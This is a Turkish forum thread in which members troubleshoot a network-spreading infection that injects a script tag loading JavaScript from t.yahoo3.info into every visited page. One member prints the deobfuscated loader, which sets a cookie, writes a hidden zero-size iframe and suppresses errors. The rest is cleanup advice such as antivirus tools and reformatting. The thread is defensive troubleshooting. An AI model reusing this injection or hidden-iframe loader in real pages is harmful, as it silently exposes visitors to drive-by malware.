Bir Virüsün Kurbanı Oldum (t.yahoo3)

[CaVeLL]

Bugün kurumumdaki bütün bilgisayarlarda aynı virüs ile güne başladım, ve canım çok sıkkın

virüs, girilen bütün internet sayfalarında aynı kodu alttan alttan çağırıyor ve sistemi acayip kasıyor..

nod32 uyarı veriyor güya ama sade uyarı vermek kalıyor, sonuçta temizleyip kurtulamıyor virüsten..

Nodun Verdiği Uyarı Penceresi :

Ağdan bütün heryere bulaşmış..

benim anlayamadığım, deepfreezeli 20 pc var onlarada bulaşmış.!

İE de gözle belli olmuyor ama Firefoxta daha belli

Sayfaların kaynak kodlarına baktığımda virüs kendini hemen gösteriyor :

Sayfalardaki kod şöyle :

<script language="javascript" SRC="http://t.yahoo3.info/vip.js"></script>[/CODE]

Nodun tek yaptığı uyarı penceresi çıkartmak..

Toplam 23 PC var ki 2 tanesinde Ticari program yüklü, formatlayıp yeniden Ticari programı yüklemek lisansalamak ve Yedekleri geri yüklemek tam bir işkence...

Eğer Dos tan veya Güvenlik Kipten ve Live CD lerden temeizleyemezsem vay halime...

Eğer bilgisi, tecrübesi, tavsiyesi, önereceği program veya yöntemi olan varsa Şiddetle ve Acilen bekliyorum arkadaşlar....!

[Metkan]

bu virüsü bende istiyorum

[Metkan]

ben dediğin adrese girdim ve çıktım uyarı verdi ama bulaşmadı

[asax]

linke girdim kopyaladım inceliyorum bakalım ne yapa bileceğiz

panda yı bi dene arkadaş prg dos tan başlatarak tarama yapacak izin ver gereken uyarılarını silde

ama okuyarak sil de yoksa çalışan prg lerın de çalışmaz olur

istersen biraz bekle

birçok virüz prgsi çalışanıda çalışmaz ediyo

[asax]

script in içindekiler bunlar

document.writeln("<script>");

document.writeln("function oK_Begin(){");

document.writeln("var Then = new Date() ");

document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");

document.writeln("var cookieString = new String(document.cookie)");

document.writeln("var cookieHeader = \"Cookie1=\" ");

document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");

document.writeln("if (beginPosition != -1){ ");

document.writeln("} else ");

document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");

document.writeln("document.write(\'<iframe width=0 height=0 src=\"

Please register to see this content.

);");

document.writeln("}");

document.writeln("}");

document.writeln("oK_Begin();");

document.writeln("<\/script>");

document.writeln("<script>window.onerror=function(){return true;}<\/script>")

[Macintosh]

Eğer bilgisi, tecrübesi, tavsiyesi, önereceği program veya yöntemi olan varsa Şiddetle ve Acilen bekliyorum arkadaşlar....!

Bu trojanla daha önce uğraşmış bir arkadaşımla msn'de haberleştik. Kurtulduğu yöntemi anlattı biraz zahmetli bir yol ama işe yarıyor diyor. Bir de bu trojanın bulaştığı pc'yi temizlemek için Administrator haklarına sahip olman gerekiyormuş. Çalıştığın kurumda problem olur mu?

[CaVeLL]

Bu trojanla daha önce uğraşmış bir arkadaşımla msn'de haberleştik. Kurtulduğu yöntemi anlattı biraz zahmetli bir yol ama işe yarıyor diyor. Bir de bu trojanın bulaştığı pc'yi temizlemek için Administrator haklarına sahip olman gerekiyormuş. Çalıştığın kurumda problem olur mu?

Problem Yok, bütün yetki ve haklara sahibim

Ağdan bulaşıyor bu virüs, ve bütün pc ler ağda bağlı olduklarından dolayı hepsine sızmış..

Şuan Nortonu deneyeceğim, bakalım nolacak..

Hepsine Format atmayı bile göze alıyorum da şu ticari programın kurulu olduğu 2 bilgisayar canımı sıkıyor...

ilgilenen cevap veren bütün arkadaşlara teşekkürler, ama tabi hala bir çözüm yok

EDİT :

Bu virüs tek dosya indirmiyor, Durum çubuğundan bakıyorumda birçok dosya indirmeye çalıyor..

birtaneside Office 2003 ile ilgili.. onu indirdikten sonra office setup penceresi açılıyor ve biraz kendi kendine kurulum yaptıktan sonra Office 2003 CD si istiyor...

Please register to see this content.

gibi adreslerede bağlanmaya çalıyor PC..

Offf be yarınki iznim bunlarla uğraşmakla geçecek, boştum normalde yarın, Allah'ım Sabır ver

[sk8er_boi]

combofix ile silmeyi denedin mi?

[asax]

Please register to see this content.

programı bi denesene

[Macintosh]

Problem Yok, bütün yetki ve haklara sahibim

@CaVeLL, kardeşim kusura bakma cevap biraz gecikti ama acil bir işim çıktı. Gitmem gerekti.

Gerekli bilgileri ÖM'den attım. Bir kontrol et. Kolay gelsin.

[blow18]

spyware doctor dene bi

[CaVeLL]

PC ler ile Uğraşmaktan bura ile ilgilenemedim, kendi PC me format attım..

Şuan benim bilgisayarda formattan sonra doğal olarak bir şey yok..

ama diğer bilgisayarları açmaya korkuyorum Zira ağdan yine zıplayabilir

Artık benden bugünlük bu kadar kafam bir milyon oldu

Norton ve Kasper ilede tarattım, Norton bişe bulamadı ama Kasper bişeler buldu.

her ihtimale karşı yukardaki arkadaşların tavsiyelerini ve verdiği programlarıda yarın deneyecem.

teker teker bakacam problem yoksa, hepsini ağa bağlayacam yine..

eğer ağa bağlandığım yine sorun çıkarsa ve aynen diğerlerine ağdan anında zıplarsa işte o zaman kafamı vuracak duvar seçmeye başlarım ki hiç farketmez en yakın duvara vururum

ilgi alaka gösteren, cevap veren, yardımcı olmaya çalışan bütün arkadaşlara teşekkür ve memnuniyetlerimi gönderiyorum...

yarın akşama bu mesajı editleyerek sonuçu yazarım..

Tekrar teşekkürler arkadaşlar, umarım verdiklerinizden yarın olumlu netice alırım..

Saygılarımla.....

EDİT : Riske giremedim ve bütün PC leri formatladım, şuan sorun yok... Gitti 2 günüm

[kimim]

Benimde cafemde aynı virüs başıma geldi araştırdım ağa bulunan makinaların birini server olarak görüyor o makinaya format atınca düzeliyor. o makinayı bulmak için hepsi kapalı iken tek tek açıp internet explorer den herhangi adrese girmek sayfanın altında t.yahoo3.info yazısı yoksa bilgisyarı kapatıp diğerini açıp deneyerek buldum ve formatladım düzelti.

[mephex]

ben bi cafede rasgeldim buna sp3 silmedi ama virusu engelledi.. yani sp3 işini görür derim ben

[kayhansel]

Bu bir js virüsü...antiarp diye bir antivirüs var, ağdan gelen ve giden paketlerin hepsini kontrol ediyor, şu an ben bulamadım onu bulursan o seni kurtarabilir, ads.js virüsüydü galiba bununla çözmüştüm ....kolay gelsin